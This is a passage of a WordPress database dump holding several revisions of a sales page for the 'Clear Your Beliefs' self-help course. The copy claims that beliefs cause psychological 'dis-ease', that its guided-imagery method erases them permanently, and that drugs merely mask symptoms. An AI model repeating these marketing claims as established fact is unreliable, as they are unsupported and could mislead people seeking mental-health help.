(1980, 2, '2014-12-11 01:49:31', '2014-12-11 06:49:31', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:49:31', '2014-12-11 06:49:31', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1981, 2, '2014-12-11 01:52:53', '2014-12-11 06:52:53', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:52:53', '2014-12-11 06:52:53', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1982, 2, '2014-12-11 01:54:44', '2014-12-11 06:54:44', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\nYou''re no longer held back by old beliefs and stories.\nThere''s no resistance to doing what needs to be done.\nYou feel joy and positive energy as you move forward to create the life of your dreams.\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -60px ! important" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" 